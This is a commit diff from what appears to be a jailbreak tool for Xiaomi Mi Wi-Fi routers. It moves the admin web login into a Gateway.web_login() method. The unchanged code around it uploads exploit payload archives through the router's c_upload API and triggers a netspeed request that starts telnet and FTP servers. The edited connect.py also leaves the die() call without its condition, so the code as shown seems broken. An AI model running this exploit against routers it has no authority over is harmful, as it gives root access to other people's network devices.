Add new method Gateway.web_login()

3 years ago · 7d2bea5ee7
parent c6b41f7605
commit 7d2bea5ee7
2 changed files with 32 additions and 22 deletions
--- a/connect.py
+++ b/connect.py
@ -44,23 +44,7 @@ print("mac = {}".format(gw.mac_address))
 if gw.ping(verbose = 0) is True:
  die(0, "Exploit already installed and running")
-if not gw.nonce_key or not gw.mac_address:
+stok = gw.web_login()
  die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.")
 nonce = "0_" + gw.mac_address + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
 password = input("Enter device WEB password: ")
 account_str = (password + gw.nonce_key).encode('utf-8')
 account_str = hashlib.sha1(account_str).hexdigest()
 password = (nonce + account_str).encode('utf-8')
 password = hashlib.sha1(password).hexdigest()
 username = 'admin'
 data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce)
 requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = ip_addr)
 r1 = requests.post(requrl, data = data, headers = get_http_headers())
 try:
  stok = re.findall(r'"token":"(.*?)"',r1.text)[0]
 except Exception:
  die("Password is not correct!")
 dn_tmp = 'tmp/'
 if gw.use_ssh:
@ -147,14 +131,13 @@ if tgz_size2 > 100*1024 - 128:
  die("File size {} exceeds 100KiB".format(fn_payload2)) 
 print("Start uploading the exploit with payload...")
 urlapi = "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = ip_addr, stok = stok)
 if (fn_payload1):
-  requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')})
+  requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')})
 if (fn_payload2):
-  requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')})
+  requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')})
 if (fn_payload3):
-  requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')})
+  requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')})
 time.sleep(1)
@ -163,7 +146,7 @@ if gw.use_ssh:
 else:
  print("Running TELNET and FTP servers...")
-requests.get(urlapi + "xqnetdetect/netspeed")
+requests.get(gw.apiurl + "xqnetdetect/netspeed")
 time.sleep(0.5)
 gw.ping()
--- a/gateway.py
+++ b/gateway.py
@ -61,6 +61,7 @@ class Gateway():
  mac_address = None
  nonce_key = None
  webpassword = None
  stok = None
  status = -2
  ftp = None
  socket = None  # TCP socket for SSH 
@ -136,6 +137,32 @@ class Gateway():
    self.status = 1
    return self.status
  def web_login(self):
    self.stok = None
    if not self.nonce_key or not self.mac_address:
      die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.")
    nonce = "0_" + self.mac_address + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
    if not self.webpassword:
      self.webpassword = input("Enter device WEB password: ")
    password = self.webpassword
    account_str = (password + self.nonce_key).encode('utf-8')
    account_str = hashlib.sha1(account_str).hexdigest()
    password = (nonce + account_str).encode('utf-8')
    password = hashlib.sha1(password).hexdigest()
    username = 'admin'
    data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce)
    requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = self.ip_addr)
    r1 = requests.post(requrl, data = data, headers = get_http_headers())
    try:
      stok = re.findall(r'"token":"(.*?)"',r1.text)[0]
    except Exception:
      die("WEB password is not correct!")
    self.stok = stok
  @property
  def apiurl(self):
    return "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = self.ip_addr, stok = self.stok)
  def shutdown(self):
    if self.use_ssh:
      try: